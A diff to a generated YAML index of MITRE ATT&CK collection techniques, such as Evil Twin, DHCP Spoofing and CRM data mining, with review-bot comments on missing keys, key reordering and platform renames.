- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
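Review bot: the new T1557.004 (Evil Twin) object is inserted under the `collection:` section only, yet its `kill_chain_phases` list `credential-access` first and `collection` second. Multi-tactic techniques in this index are repeated once per tactic (DHCP Spoofing, which carries the same two phases, also appears under `collection:` in this diff), so please confirm that the credential-access section of the same file gains a matching T1557.004 entry in this PR. One smaller point on the same object: `x_mitre_detection: ''` is an empty string where every other technique carries prose, so check that whatever consumes the index tolerates the empty value; `atomic_tests: []` is correct since no test exists yet.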
@@ -45145,7 +45706,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -45175,8 +45736,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
@@ -45230,7 +45789,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -45267,7 +45825,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -45295,12 +45853,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
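Review bot: T1185 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` here, with no bumped `x_mitre_attack_spec_version` added in either of its hunks, so Browser Session Hijacking ends up without the key; T1602.002 is affected the same way in this patch, while every other object keeps or updates it. A quick grep of the generated file for technique entries lacking `x_mitre_attack_spec_version` before merging would tell whether this is a generator gap or faithful to upstream.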
@@ -45337,23 +45893,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
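Review bot: this hunk is pure key reordering for DHCP Spoofing (contributors, deprecated, domains and is_subtechnique move above platforms with their content unchanged), and the same churn appears for T1213.001, T1074 and T1213.003 further down. If the generator serialised the `technique` keys in one fixed order (sorted, or consistently in upstream STIX order), an upstream sync would diff down to the real changes, which here are the `modified` date and the spec version.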
@@ -45386,21 +45942,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -45508,12 +46063,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45524,13 +46078,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -45544,6 +46098,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -45554,12 +46109,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -45604,30 +46159,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -45637,31 +46173,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
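Review bot: `x_mitre_permissions_required` (User) is dropped from Confluence here, and T1056 loses its Administrator/SYSTEM/root/User list later in the patch, with nothing replacing the field; the newly added T1213.004 object carries no such key either, so the field appears to be gone from the source data. If any index CSV column, README generator or filter still reads `x_mitre_permissions_required`, adjust it before this lands; if nothing consumes it, the removal is fine.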
@@ -45694,10 +46247,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -45706,16 +46261,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
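Review bot: `Office 365` and `Google Workspace` are replaced by a single `Office Suite` platform for Email Forwarding Rule, and the same substitution hits T1114.002 and T1213 further down. Any per-platform index derived from `x_mitre_platforms` will silently lose these techniques under the old names, so an Office 365 or Google Workspace index, if one is generated, needs to be regenerated or retired and an `Office Suite` index produced in the same change. The version bump to 1.4 and the new `Cloud Service: Cloud Service Metadata` data source are consistent with that upstream change.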
@@ -45747,70 +46303,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
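Review bot: the Mandiant M-Trends 2020 reference URL changes from content.fireeye.com to a mandiant.com PDF, while the PwC Cloud Hopper Wayback URL keeps `https:/www.pwc.co.uk` with a single slash after the scheme. That single slash is carried over verbatim from the removed line, so it is upstream's value and not a typo introduced here; if reference links are ever validated, expect that one to need normalising upstream. The rest of the Data Staged hunk is key reordering with identical content plus the `modified` update and the `x_mitre_attack_spec_version` bump from 2.1.0 to 3.2.0.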
@@ -45883,7 +46435,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests:
- name: AppleScript - Prompt User for Password
@@ -45966,12 +46517,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -45983,6 +46533,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -45990,11 +46543,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -46011,14 +46564,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -46034,6 +46584,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -46042,13 +46593,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -46056,15 +46607,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -46075,9 +46622,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
